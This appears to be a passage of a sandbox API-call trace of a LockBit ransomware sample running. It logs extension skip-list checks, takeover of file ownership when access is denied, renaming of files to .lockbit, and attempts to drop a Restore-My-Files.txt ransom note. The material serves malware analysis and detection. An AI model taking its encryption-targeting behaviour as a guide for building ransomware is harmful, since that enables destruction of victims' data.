[0078.737] lstrcmpiW (lpString1=".ckp", lpString2=".mui") returned -1 [0078.737] lstrcmpiW (lpString1=".dacpac", lpString2=".mui") returned -1 [0078.737] lstrcmpiW (lpString1=".db", lpString2=".mui") returned -1 [0078.737] lstrcmpiW (lpString1=".db-shm", lpString2=".mui") returned -1 [0078.737] lstrcmpiW (lpString1=".db-wal", lpString2=".mui") returned -1 [0078.737] lstrcmpiW (lpString1=".db3", lpString2=".mui") returned -1 [0078.737] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0078.737] lstrcmpiW (lpString1=".dbc", lpString2=".mui") returned -1 [0078.737] lstrcmpiW (lpString1=".dbs", lpString2=".mui") returned -1 [0078.737] lstrcmpiW (lpString1=".dbt", lpString2=".mui") returned -1 [0078.737] lstrcmpiW (lpString1=".dbv", lpString2=".mui") returned -1 [0078.737] lstrcmpiW (lpString1=".frm", lpString2=".mui") returned -1 [0078.737] lstrcmpiW (lpString1=".mdf", lpString2=".mui") returned -1 [0078.737] lstrcmpiW (lpString1=".mrg", lpString2=".mui") returned -1 [0078.737] lstrcmpiW (lpString1=".mwb", lpString2=".mui") returned 1 [0078.737] lstrcmpiW (lpString1=".myd", lpString2=".mui") returned 1 [0078.737] lstrcmpiW (lpString1=".ndf", lpString2=".mui") returned 1 [0078.737] lstrcmpiW (lpString1=".qry", lpString2=".mui") returned 1 [0078.737] lstrcmpiW (lpString1=".sdb", lpString2=".mui") returned 1 [0078.738] lstrcmpiW (lpString1=".sdf", lpString2=".mui") returned 1 [0078.738] lstrcmpiW (lpString1=".sql", lpString2=".mui") returned 1 [0078.738] lstrcmpiW (lpString1=".sqlite", lpString2=".mui") returned 1 [0078.738] lstrcmpiW (lpString1=".sqlite3", lpString2=".mui") returned 1 [0078.738] lstrcmpiW (lpString1=".sqlitedb", lpString2=".mui") returned 1 [0078.738] lstrcmpiW (lpString1=".tmd", lpString2=".mui") returned 1 [0078.738] wsprintfW (in: param_1=0x344c620, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui.lockbit") returned 92 [0078.738] lstrcmpiW (lpString1=".mui", lpString2=".lockbit") returned 1 [0078.738] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\ipsmigrationplugin.dll.mui"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\ipsmigrationplugin.dll.mui.lockbit")) returned 0 [0078.738] GetLastError () returned 0x5 [0078.739] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0078.739] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0078.739] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0078.740] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0078.740] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0078.740] NtOpenFile (in: FileHandle=0x344c5c8, DesiredAccess=0x80, ObjectAttributes=0x344c478*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\ipsmigrationplugin.dll.mui"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344c470, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344c5c8*=0x3b4, IoStatusBlock=0x344c470*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0078.741] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0078.741] NtQueryInformationFile (in: FileHandle=0x3b4, IoStatusBlock=0x344c490, FileInformation=0x344c350, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344c490, FileInformation=0x344c350) returned 0x0 [0078.754] NtClose (Handle=0x3b4) returned 0x0 [0078.754] RtlFreeAnsiString (AnsiString="\\") [0078.754] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344c604 | out: TokenHandle=0x344c604*=0x3b4) returned 1 [0078.754] malloc (_Size=0x200) returned 0x53fcc0 [0078.754] GetTokenInformation (in: TokenHandle=0x3b4, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344c600 | out: TokenInformation=0x53fcc0, ReturnLength=0x344c600) returned 1 [0078.755] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344c5e8, dwRevision=0x1 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0078.755] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344c5e8, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0078.755] CloseHandle (hObject=0x3b4) returned 1 [0078.755] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui", SecurityInformation=0x1, pSecurityDescriptor=0x344c5e8) returned 1 [0078.755] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui", SecurityInformation=0x4, pSecurityDescriptor=0x344c5e8) returned 1 [0078.756] free (_Block=0x53fcc0) [0078.756] lstrcmpiW (lpString1=".mui", lpString2=".lockbit") returned 1 [0078.756] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\ipsmigrationplugin.dll.mui"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\ipsmigrationplugin.dll.mui.lockbit")) returned 1 [0078.757] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\ipsmigrationplugin.dll.mui.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b4 [0078.757] CreateIoCompletionPort (FileHandle=0x3b4, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0078.757] malloc (_Size=0x40068) returned 0x20abae0 [0078.757] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x20abaf8 | out: lpFileSize=0x20abaf8*=2560) returned 1 [0078.757] ReadFile (in: hFile=0x3b4, lpBuffer=0x20abb14, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x20abb14*, lpNumberOfBytesRead=0x0, lpOverlapped=0x20abae0) returned 1 [0078.760] GetLastError () returned 0x3e5 [0078.760] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\IpsMigrationPlugin.dll.mui" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US") returned 1 [0078.760] wsprintfW (in: param_1=0x344c3d8, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\Restore-My-Files.txt") returned 78 [0078.760] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0078.760] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x250aa25, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x250aa25, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x9a5aa753, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x36400, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="join.avi", cAlternateFileName="")) returned 1 [0078.760] lstrcmpiW (lpString1=".", lpString2="join.avi") returned -1 [0078.760] lstrcmpiW (lpString1="..", lpString2="join.avi") returned -1 [0078.760] PathFindExtensionW (pszPath="join.avi") returned=".avi" [0078.760] lstrcmpiW (lpString1=".386", lpString2=".avi") returned -1 [0078.760] lstrcmpiW (lpString1=".cmd", lpString2=".avi") returned 1 [0078.760] lstrcmpiW (lpString1=".exe", lpString2=".avi") returned 1 [0078.760] lstrcmpiW (lpString1=".ani", lpString2=".avi") returned -1 [0078.760] lstrcmpiW (lpString1=".adv", lpString2=".avi") returned -1 [0078.760] lstrcmpiW (lpString1=".theme", lpString2=".avi") returned 1 [0078.760] lstrcmpiW (lpString1=".msi", lpString2=".avi") returned 1 [0078.760] lstrcmpiW (lpString1=".msp", lpString2=".avi") returned 1 [0078.760] lstrcmpiW (lpString1=".com", lpString2=".avi") returned 1 [0078.761] lstrcmpiW (lpString1=".diagpkg", lpString2=".avi") returned 1 [0078.761] lstrcmpiW (lpString1=".nls", lpString2=".avi") returned 1 [0078.761] lstrcmpiW (lpString1=".diagcab", lpString2=".avi") returned 1 [0078.761] lstrcmpiW (lpString1=".lock", lpString2=".avi") returned 1 [0078.761] lstrcmpiW (lpString1=".ocx", lpString2=".avi") returned 1 [0078.761] lstrcmpiW (lpString1=".mpa", lpString2=".avi") returned 1 [0078.761] lstrcmpiW (lpString1=".cpl", lpString2=".avi") returned 1 [0078.761] lstrcmpiW (lpString1=".mod", lpString2=".avi") returned 1 [0078.761] lstrcmpiW (lpString1=".hta", lpString2=".avi") returned 1 [0078.761] lstrcmpiW (lpString1=".icns", lpString2=".avi") returned 1 [0078.761] lstrcmpiW (lpString1=".prf", lpString2=".avi") returned 1 [0078.761] lstrcmpiW (lpString1=".rtp", lpString2=".avi") returned 1 [0078.761] lstrcmpiW (lpString1=".diagcfg", lpString2=".avi") returned 1 [0078.761] lstrcmpiW (lpString1=".msstyles", lpString2=".avi") returned 1 [0078.761] lstrcmpiW (lpString1=".bin", lpString2=".avi") returned 1 [0078.761] lstrcmpiW (lpString1=".hlp", lpString2=".avi") returned 1 [0078.761] lstrcmpiW (lpString1=".shs", lpString2=".avi") returned 1 [0078.761] lstrcmpiW (lpString1=".drv", lpString2=".avi") returned 1 [0078.761] lstrcmpiW (lpString1=".wpx", lpString2=".avi") returned 1 [0078.761] lstrcmpiW (lpString1=".bat", lpString2=".avi") returned 1 [0078.761] lstrcmpiW (lpString1=".rom", lpString2=".avi") returned 1 [0078.761] lstrcmpiW (lpString1=".msc", lpString2=".avi") returned 1 [0078.761] lstrcmpiW (lpString1=".spl", lpString2=".avi") returned 1 [0078.762] lstrcmpiW (lpString1=".ps1", lpString2=".avi") returned 1 [0078.762] lstrcmpiW (lpString1=".msu", lpString2=".avi") returned 1 [0078.762] lstrcmpiW (lpString1=".ics", lpString2=".avi") returned 1 [0078.762] lstrcmpiW (lpString1=".key", lpString2=".avi") returned 1 [0078.762] lstrcmpiW (lpString1=".mp3", lpString2=".avi") returned 1 [0078.762] lstrcmpiW (lpString1=".reg", lpString2=".avi") returned 1 [0078.762] lstrcmpiW (lpString1=".dll", lpString2=".avi") returned 1 [0078.762] lstrcmpiW (lpString1=".ini", lpString2=".avi") returned 1 [0078.762] lstrcmpiW (lpString1=".idx", lpString2=".avi") returned 1 [0078.762] lstrcmpiW (lpString1=".sys", lpString2=".avi") returned 1 [0078.762] lstrcmpiW (lpString1=".hlp", lpString2=".avi") returned 1 [0078.762] lstrcmpiW (lpString1=".ico", lpString2=".avi") returned 1 [0078.762] lstrcmpiW (lpString1=".lnk", lpString2=".avi") returned 1 [0078.762] lstrcmpiW (lpString1=".rdp", lpString2=".avi") returned 1 [0078.762] wsprintfW (in: param_1=0x344ce80, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0078.762] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="join.avi") returned 1 [0078.762] lstrcmpiW (lpString1="ntldr", lpString2="join.avi") returned 1 [0078.762] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="join.avi") returned 1 [0078.762] lstrcmpiW (lpString1="bootsect.bak", lpString2="join.avi") returned -1 [0078.762] lstrcmpiW (lpString1="autorun.inf", lpString2="join.avi") returned -1 [0078.762] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\") returned="" [0078.762] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi") returned=".avi" [0078.762] lstrcmpiW (lpString1=".rar", lpString2=".avi") returned 1 [0078.763] lstrcmpiW (lpString1=".zip", lpString2=".avi") returned 1 [0078.763] lstrcmpiW (lpString1=".7z", lpString2=".avi") returned -1 [0078.763] lstrcmpiW (lpString1=".ckp", lpString2=".avi") returned 1 [0078.763] lstrcmpiW (lpString1=".dacpac", lpString2=".avi") returned 1 [0078.763] lstrcmpiW (lpString1=".db", lpString2=".avi") returned 1 [0078.763] lstrcmpiW (lpString1=".db-shm", lpString2=".avi") returned 1 [0078.763] lstrcmpiW (lpString1=".db-wal", lpString2=".avi") returned 1 [0078.763] lstrcmpiW (lpString1=".db3", lpString2=".avi") returned 1 [0078.763] lstrcmpiW (lpString1=".dbf", lpString2=".avi") returned 1 [0078.763] lstrcmpiW (lpString1=".dbc", lpString2=".avi") returned 1 [0078.763] lstrcmpiW (lpString1=".dbs", lpString2=".avi") returned 1 [0078.763] lstrcmpiW (lpString1=".dbt", lpString2=".avi") returned 1 [0078.763] lstrcmpiW (lpString1=".dbv", lpString2=".avi") returned 1 [0078.763] lstrcmpiW (lpString1=".frm", lpString2=".avi") returned 1 [0078.763] lstrcmpiW (lpString1=".mdf", lpString2=".avi") returned 1 [0078.763] lstrcmpiW (lpString1=".mrg", lpString2=".avi") returned 1 [0078.763] lstrcmpiW (lpString1=".mwb", lpString2=".avi") returned 1 [0078.763] lstrcmpiW (lpString1=".myd", lpString2=".avi") returned 1 [0078.764] lstrcmpiW (lpString1=".ndf", lpString2=".avi") returned 1 [0078.764] lstrcmpiW (lpString1=".qry", lpString2=".avi") returned 1 [0078.764] lstrcmpiW (lpString1=".sdb", lpString2=".avi") returned 1 [0078.764] lstrcmpiW (lpString1=".sdf", lpString2=".avi") returned 1 [0078.764] lstrcmpiW (lpString1=".sql", lpString2=".avi") returned 1 [0078.764] lstrcmpiW (lpString1=".sqlite", lpString2=".avi") returned 1 [0078.764] lstrcmpiW (lpString1=".sqlite3", lpString2=".avi") returned 1 [0078.764] lstrcmpiW (lpString1=".sqlitedb", lpString2=".avi") returned 1 [0078.764] lstrcmpiW (lpString1=".tmd", lpString2=".avi") returned 1 [0078.764] wsprintfW (in: param_1=0x344c620, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.lockbit") returned 74 [0078.764] lstrcmpiW (lpString1=".avi", lpString2=".lockbit") returned -1 [0078.764] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi.lockbit")) returned 0 [0078.764] GetLastError () returned 0x5 [0078.765] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0078.765] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0078.765] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0078.765] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0078.765] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0078.766] NtOpenFile (in: FileHandle=0x344c5c8, DesiredAccess=0x80, ObjectAttributes=0x344c478*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344c470, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344c5c8*=0x3bc, IoStatusBlock=0x344c470*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0078.766] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0078.766] NtQueryInformationFile (in: FileHandle=0x3bc, IoStatusBlock=0x344c490, FileInformation=0x344c350, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344c490, FileInformation=0x344c350) returned 0x0 [0078.779] NtClose (Handle=0x3bc) returned 0x0 [0078.779] RtlFreeAnsiString (AnsiString="\\") [0078.779] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344c604 | out: TokenHandle=0x344c604*=0x3bc) returned 1 [0078.779] malloc (_Size=0x200) returned 0x53fcc0 [0078.779] GetTokenInformation (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344c600 | out: TokenInformation=0x53fcc0, ReturnLength=0x344c600) returned 1 [0078.780] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344c5e8, dwRevision=0x1 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0078.780] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344c5e8, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0078.780] CloseHandle (hObject=0x3bc) returned 1 [0078.780] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", SecurityInformation=0x1, pSecurityDescriptor=0x344c5e8) returned 1 [0078.780] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi", SecurityInformation=0x4, pSecurityDescriptor=0x344c5e8) returned 1 [0078.781] free (_Block=0x53fcc0) [0078.781] lstrcmpiW (lpString1=".avi", lpString2=".lockbit") returned -1 [0078.781] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi.lockbit")) returned 1 [0078.782] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\join.avi.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0078.782] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0078.782] malloc (_Size=0x40068) returned 0x3940048 [0078.782] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x3940060 | out: lpFileSize=0x3940060*=222208) returned 1 [0078.782] ReadFile (in: hFile=0x3bc, lpBuffer=0x394007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048 | out: lpBuffer=0x394007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3940048) returned 1 [0078.785] GetLastError () returned 0x3e5 [0078.785] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\join.avi" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US") returned 1 [0078.785] wsprintfW (in: param_1=0x344c3d8, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\Restore-My-Files.txt") returned 78 [0078.785] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0078.785] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x110442fe, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x1138bee4, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x110442fe, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x2200, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="micaut.dll.mui", cAlternateFileName="")) returned 1 [0078.785] lstrcmpiW (lpString1=".", lpString2="micaut.dll.mui") returned -1 [0078.785] lstrcmpiW (lpString1="..", lpString2="micaut.dll.mui") returned -1 [0078.785] PathFindExtensionW (pszPath="micaut.dll.mui") returned=".mui" [0078.785] lstrcmpiW (lpString1=".386", lpString2=".mui") returned -1 [0078.785] lstrcmpiW (lpString1=".cmd", lpString2=".mui") returned -1 [0078.785] lstrcmpiW (lpString1=".exe", lpString2=".mui") returned -1 [0078.785] lstrcmpiW (lpString1=".ani", lpString2=".mui") returned -1 [0078.785] lstrcmpiW (lpString1=".adv", lpString2=".mui") returned -1 [0078.785] lstrcmpiW (lpString1=".theme", lpString2=".mui") returned 1 [0078.786] lstrcmpiW (lpString1=".msi", lpString2=".mui") returned -1 [0078.786] lstrcmpiW (lpString1=".msp", lpString2=".mui") returned -1 [0078.786] lstrcmpiW (lpString1=".com", lpString2=".mui") returned -1 [0078.786] lstrcmpiW (lpString1=".diagpkg", lpString2=".mui") returned -1 [0078.786] lstrcmpiW (lpString1=".nls", lpString2=".mui") returned 1 [0078.786] lstrcmpiW (lpString1=".diagcab", lpString2=".mui") returned -1 [0078.786] lstrcmpiW (lpString1=".lock", lpString2=".mui") returned -1 [0078.786] lstrcmpiW (lpString1=".ocx", lpString2=".mui") returned 1 [0078.786] lstrcmpiW (lpString1=".mpa", lpString2=".mui") returned -1 [0078.786] lstrcmpiW (lpString1=".cpl", lpString2=".mui") returned -1 [0078.786] lstrcmpiW (lpString1=".mod", lpString2=".mui") returned -1 [0078.786] lstrcmpiW (lpString1=".hta", lpString2=".mui") returned -1 [0078.786] lstrcmpiW (lpString1=".icns", lpString2=".mui") returned -1 [0078.786] lstrcmpiW (lpString1=".prf", lpString2=".mui") returned 1 [0078.786] lstrcmpiW (lpString1=".rtp", lpString2=".mui") returned 1 [0078.786] lstrcmpiW (lpString1=".diagcfg", lpString2=".mui") returned -1 [0078.786] lstrcmpiW (lpString1=".msstyles", lpString2=".mui") returned -1 [0078.786] lstrcmpiW (lpString1=".bin", lpString2=".mui") returned -1 [0078.786] lstrcmpiW (lpString1=".hlp", lpString2=".mui") returned -1 [0078.786] lstrcmpiW (lpString1=".shs", lpString2=".mui") returned 1 [0078.786] lstrcmpiW (lpString1=".drv", lpString2=".mui") returned -1 [0078.786] lstrcmpiW (lpString1=".wpx", lpString2=".mui") returned 1 [0078.786] lstrcmpiW (lpString1=".bat", lpString2=".mui") returned -1 [0078.787] lstrcmpiW (lpString1=".rom", lpString2=".mui") returned 1 [0078.787] lstrcmpiW (lpString1=".msc", lpString2=".mui") returned -1 [0078.787] lstrcmpiW (lpString1=".spl", lpString2=".mui") returned 1 [0078.787] lstrcmpiW (lpString1=".ps1", lpString2=".mui") returned 1 [0078.787] lstrcmpiW (lpString1=".msu", lpString2=".mui") returned -1 [0078.787] lstrcmpiW (lpString1=".ics", lpString2=".mui") returned -1 [0078.787] lstrcmpiW (lpString1=".key", lpString2=".mui") returned -1 [0078.787] lstrcmpiW (lpString1=".mp3", lpString2=".mui") returned -1 [0078.787] lstrcmpiW (lpString1=".reg", lpString2=".mui") returned 1 [0078.787] lstrcmpiW (lpString1=".dll", lpString2=".mui") returned -1 [0078.787] lstrcmpiW (lpString1=".ini", lpString2=".mui") returned -1 [0078.787] lstrcmpiW (lpString1=".idx", lpString2=".mui") returned -1 [0078.787] lstrcmpiW (lpString1=".sys", lpString2=".mui") returned 1 [0078.787] lstrcmpiW (lpString1=".hlp", lpString2=".mui") returned -1 [0078.787] lstrcmpiW (lpString1=".ico", lpString2=".mui") returned -1 [0078.787] lstrcmpiW (lpString1=".lnk", lpString2=".mui") returned -1 [0078.787] lstrcmpiW (lpString1=".rdp", lpString2=".mui") returned 1 [0078.787] wsprintfW (in: param_1=0x344ce80, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0078.787] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="micaut.dll.mui") returned 1 [0078.787] lstrcmpiW (lpString1="ntldr", lpString2="micaut.dll.mui") returned 1 [0078.787] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="micaut.dll.mui") returned 1 [0078.787] lstrcmpiW (lpString1="bootsect.bak", lpString2="micaut.dll.mui") returned -1 [0078.787] lstrcmpiW (lpString1="autorun.inf", lpString2="micaut.dll.mui") returned -1 [0078.788] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\") returned="" [0078.788] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\micaut.dll.mui") returned=".mui" [0078.788] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0078.788] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0078.788] lstrcmpiW (lpString1=".7z", lpString2=".mui") returned -1 [0078.788] lstrcmpiW (lpString1=".ckp", lpString2=".mui") returned -1 [0078.788] lstrcmpiW (lpString1=".dacpac", lpString2=".mui") returned -1 [0078.788] lstrcmpiW (lpString1=".db", lpString2=".mui") returned -1 [0078.788] lstrcmpiW (lpString1=".db-shm", lpString2=".mui") returned -1 [0078.788] lstrcmpiW (lpString1=".db-wal", lpString2=".mui") returned -1 [0078.788] lstrcmpiW (lpString1=".db3", lpString2=".mui") returned -1 [0078.788] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0078.788] lstrcmpiW (lpString1=".dbc", lpString2=".mui") returned -1 [0078.788] lstrcmpiW (lpString1=".dbs", lpString2=".mui") returned -1 [0078.788] lstrcmpiW (lpString1=".dbt", lpString2=".mui") returned -1 [0078.788] lstrcmpiW (lpString1=".dbv", lpString2=".mui") returned -1 [0078.788] lstrcmpiW (lpString1=".frm", lpString2=".mui") returned -1 [0078.788] lstrcmpiW (lpString1=".mdf", lpString2=".mui") returned -1 [0078.788] lstrcmpiW (lpString1=".mrg", lpString2=".mui") returned -1 [0078.788] lstrcmpiW (lpString1=".mwb", lpString2=".mui") returned 1 [0078.788] lstrcmpiW (lpString1=".myd", lpString2=".mui") returned 1 [0078.789] lstrcmpiW (lpString1=".ndf", lpString2=".mui") returned 1 [0078.789] lstrcmpiW (lpString1=".qry", lpString2=".mui") returned 1 [0078.789] lstrcmpiW (lpString1=".sdb", lpString2=".mui") returned 1 [0078.789] lstrcmpiW (lpString1=".sdf", lpString2=".mui") returned 1 [0078.789] lstrcmpiW (lpString1=".sql", lpString2=".mui") returned 1 [0078.789] lstrcmpiW (lpString1=".sqlite", lpString2=".mui") returned 1 [0078.789] lstrcmpiW (lpString1=".sqlite3", lpString2=".mui") returned 1 [0078.789] lstrcmpiW (lpString1=".sqlitedb", lpString2=".mui") returned 1 